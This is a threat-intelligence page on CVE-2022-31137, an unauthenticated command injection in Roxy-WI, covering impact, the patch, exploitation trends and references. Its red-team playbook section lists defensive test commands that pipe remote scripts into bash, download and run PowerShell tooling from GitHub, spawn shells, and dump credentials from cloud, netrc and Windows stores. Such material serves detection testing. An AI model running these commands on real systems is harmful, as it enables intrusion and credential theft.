CVE-2022-31137
Overview
This vulnerability is a remote command injection caused by improper input validation in the subprocess_execute function within the /app/options.py component of Roxy-WI. The function executes system commands using user-supplied input without sanitization, allowing arbitrary command execution. The flaw affects all versions of Roxy-WI prior to 6.1.1.0 and is triggered through the web interface managing multiple server types.
Vulnerability Description
Roxy-WI is a web interface for managing Haproxy, Nginx, Apache and Keepalived servers. Versions prior to 6.1.1.0 are subject to a remote code execution vulnerability. System commands can be run remotely via the subprocess_execute function without processing the inputs received from the user in the /app/options.py file. Attackers need not be authenticated to exploit this vulnerability. Users are advised to upgrade. There are no known workarounds for this vulnerability.
Impact
An unauthenticated remote attacker can execute arbitrary system commands on the affected server, potentially leading to full system compromise, data theft, or service disruption. No user interaction or prior authentication is required, increasing exploitability over the network. The vulnerability has a CVSS vector indicating network attack complexity is low, no privileges or user interaction are needed, and it affects confidentiality, integrity, and availability at a high level.
Solution
Users must upgrade Roxy-WI to version 6.1.1.0 or later as detailed in the official GitHub security advisory GHSA-53r2-mq99-f532. The patch, committed under ID 82666df1e60c45dd6aa533b01a392f015d32f755, addresses the subprocess_execute input validation flaw. No workarounds are available, so applying the vendor-provided update is the only effective remediation.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in Roxy-WI arises from an inadequate input validation mechanism within the subprocess_execute function located in the /app/options.py file. This flaw allows an attacker to execute arbitrary system commands remotely without requiring any form of authentication. The lack of input sanitization means that user-supplied data can be directly passed to the operating system, leading to potential command injection attacks. The severity of this vulnerability is underscored by its high CVSS score, indicating a critical risk to systems utilizing this web interface for managing server configurations.
Exploitation of this vulnerability can occur through various attack vectors. An attacker could craft a malicious request to the Roxy-WI interface, embedding harmful commands within the input parameters. Given that no authentication is necessary, any unauthenticated user on the network can initiate an attack, significantly broadening the attack surface. Scenarios may include executing commands that could alter system configurations, install malware, or exfiltrate sensitive data. The potential for remote code execution means that attackers could gain complete control over the affected server, leading to further compromises within the network.
The real-world impact of this vulnerability is substantial, particularly for organizations that rely on Roxy-WI for managing critical server infrastructure. Successful exploitation could lead to unauthorized access to sensitive information, disruption of services, or even complete system takeovers. The business risks associated with such incidents include financial losses, reputational damage, and potential legal ramifications stemming from data breaches. Organizations may face regulatory scrutiny, especially if sensitive customer data is compromised. Furthermore, the operational impact could result in significant downtime as systems are remediated and secured.
To detect and mitigate the risks associated with this vulnerability, organizations should prioritize upgrading to the latest version of Roxy-WI, which addresses the flaw. Regularly updating software is a fundamental practice in cybersecurity hygiene that can significantly reduce exposure to known vulnerabilities. Additionally, implementing network segmentation and access controls can help limit exposure to the Roxy-WI interface, thereby reducing the likelihood of unauthorized access. Monitoring logs for unusual activity and employing intrusion detection systems can also aid in identifying potential exploitation attempts. Organizations should conduct regular security assessments and penetration testing to evaluate their defenses against such vulnerabilities.
In conclusion, the vulnerability present in Roxy-WI represents a critical threat to organizations utilizing this web interface for server management. The ease of exploitation, combined with the potential for severe consequences, necessitates immediate attention from affected users. By adopting proactive measures such as timely upgrades, robust access controls, and continuous monitoring, organizations can significantly mitigate the risks associated with this vulnerability and enhance their overall security posture.
CSURFACE threat intelligence has detected a notable surge in exploitation attempts targeting the Roxy-WI remote code execution vulnerability. This uptick in activity, although not accompanied by a change in the EPSS score, indicates increased adversary interest and potential weaponization within attacker communities. The availability of a Metasploit module facilitating unauthenticated command injection has likely contributed to this trend by lowering the technical barrier for exploitation. For defenders, this escalation underscores the urgency of monitoring for indicators of compromise related to Roxy-WI and reassessing exposure, especially in environments where legacy versions remain in use. While the overall risk rating remains critical, the increased exploitation activity elevates the immediacy of the threat, signaling a higher likelihood of successful attacks if mitigations are not promptly applied.
Update 2 — July 31, 2026
CSURFACE threat intelligence has identified a slight increase in exploitation attempts targeting the Roxy-WI remote code execution vulnerability, coinciding with stable EPSS scores that suggest ongoing but not accelerating attacker interest. Our telemetry indicates a modest uptick in scanning and probing activities, likely driven by the continued availability of the Metasploit module, which lowers the technical barrier for unauthenticated exploitation. This subtle rise in adversary engagement signals that threat actors remain actively probing vulnerable environments, maintaining pressure on organizations that have yet to upgrade. While the overall critical severity rating remains unchanged, the persistence and incremental growth in exploitation attempts underscore a sustained threat environment where successful intrusions are increasingly probable if defenses are not reinforced. Defenders should interpret this as a confirmation of the vulnerability’s attractiveness and the necessity for vigilant monitoring, as the risk of compromise remains immediate and tangible.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Roxy-Wi | Roxy-Wi | All |
cpe:2.3:a:roxy-wi:roxy-wi:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Roxy-WI Prior to 6.1.1.0 Unauthenticated Command Injection RCE
exploits/linux/http/roxy_wi_exec
|
- | Unknown | - | View |
Threat Feed
8 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-88 | OS Command Injection |
52%
|
High | High | |
| CAPEC-43 | Exploiting Multiple Input Interpretation Layers |
51%
|
Medium | High | |
| CAPEC-6 | Argument Injection |
48%
|
High | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (7)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2022-31137 |
| github.com |
GitHub CVE
|
https://github.com/hap-wi/roxy-wi/security/advisories/GHSA-53r2-mq99-f532 |
| github.com |
GitHub CVE
|
https://github.com/hap-wi/roxy-wi/commit/82666df1e60c45dd6aa533b01a392f015d32f755 |
| packetstormsecurity.com |
GitHub CVE
|
http://packetstormsecurity.com/files/167805/Roxy-WI-Remote-Command-Execution.html |
| packetstormsecurity.com |
GitHub CVE
|
http://packetstormsecurity.com/files/171648/Roxy-WI-6.1.0.0-Improper-Authentication-Control.html |
| packetstormsecurity.com |
GitHub CVE
|
http://packetstormsecurity.com/files/171652/Roxy-WI-6.1.1.0-Remote-Code-Execution.html |
| packetstormsecurity.com |
GitHub CVE
|
http://packetstormsecurity.com/files/172547/Roxy-WI-6.1.0.0-Remote-Command-Execution.html |